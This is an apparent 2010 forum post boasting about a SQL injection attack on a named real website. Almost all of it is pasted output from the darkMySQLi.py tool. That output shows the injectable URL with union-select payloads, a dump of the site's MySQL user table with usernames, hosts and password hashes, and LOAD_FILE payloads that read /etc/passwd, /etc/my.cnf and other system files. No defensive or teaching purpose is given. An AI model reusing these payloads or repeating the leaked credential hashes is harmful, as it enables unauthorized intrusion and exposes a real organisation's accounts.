dragonsoft "security site"
Date: May 06, 2010 04:26PM
dragonsoft.com, either a honeypot or a really bad waf site.
[+] URL: http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,darkc0de,3,4,5,6
[+] 15:19:04
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dragonsoft
User: www@www-local.dragonsoft.com
Version: 5.1.30-log
[+] Do we have Access to MySQL Database: YES <-- w00t w00t
[+] Dumping MySQL user info. user:password:host[+] Number of users in the mysql.user table: 14
[0] root:*0278533C1B8D00F28BBCD192F38923679C1E71D4:localhost
[1] root:*0278533C1B8D00F28BBCD192F38923679C1E71D4:test.dragonsoft
[2] root:*0278533C1B8D00F28BBCD192F38923679C1E71D4:127.0.0.1
[3] localhost:N:U
[4] test.dragonsoft:N:U
[5] webprot:*ECA459A855FC3E72F690A6595BA4DA5E472D760E:localhost
[6] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:localhost
[7] dcalendar:*090F8762C8C0778DFDBB200DD8748F979D812C18:localhost
[8] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.3
[9] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.4
[10] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.5
[11] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.6
[12] webprot:*ECA459A855FC3E72F690A6595BA4DA5E472D760E:%
[13] dcalendar:*090F8762C8C0778DFDBB200DD8748F979D812C18:192.168.2.%
[+] Do we have Access to Load_File: YES <-- w00t w00t
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,darkc0de,3,4,5,6
[+] 15:24:51
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dragonsoft
User: www@www-local.dragonsoft.com
Version: 5.1.30-log
[+] Do we have Access to MySQL Database: YES <-- w00t w00t
[+] Dumping MySQL user info. user:password:host[+] Number of users in the mysql.user table: 14
[0] root:*0278533C1B8D00F28BBCD192F38923679C1E71D4:localhost
[1] root:*0278533C1B8D00F28BBCD192F38923679C1E71D4:test.dragonsoft
[2] root:*0278533C1B8D00F28BBCD192F38923679C1E71D4:127.0.0.1
[3] localhost:N:U
[4] test.dragonsoft:N:U
[5] webprot:*ECA459A855FC3E72F690A6595BA4DA5E472D760E:localhost
[6] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:localhost
[7] dcalendar:*090F8762C8C0778DFDBB200DD8748F979D812C18:localhost
[8] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.3
[9] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.4
[10] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.5
[11] www:*7ECEBBD1459FB97E2FE2BB2721BDCAE1483C9EDD:192.168.2.6
[12] webprot:*ECA459A855FC3E72F690A6595BA4DA5E472D760E:%
[13] dcalendar:*090F8762C8C0778DFDBB200DD8748F979D812C18:192.168.2.%
[+] Do we have Access to Load_File: YES <-- w00t w00t
[+] Starting Load_File Fuzzer...
[+] Number of tables names to be fuzzed: 236
[!] Found /etc/passwd
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6--
[!] Found /etc/hosts
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f686f737473),3,4,5,6--
[!] Found /etc/motd
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f6d6f7464),3,4,5,6--
[!] Found /etc/fstab
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f6673746162),3,4,5,6--
[!] Found /etc/my.cnf
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f6d792e636e66),3,4,5,6--
[!] Found /etc/group
[!] http://www.dragonsoft.com/events/list.php?id=33+and+1=2+union+select+1,LOAD_FILE(0x2f6574632f67726f7570),3,4,5,6--
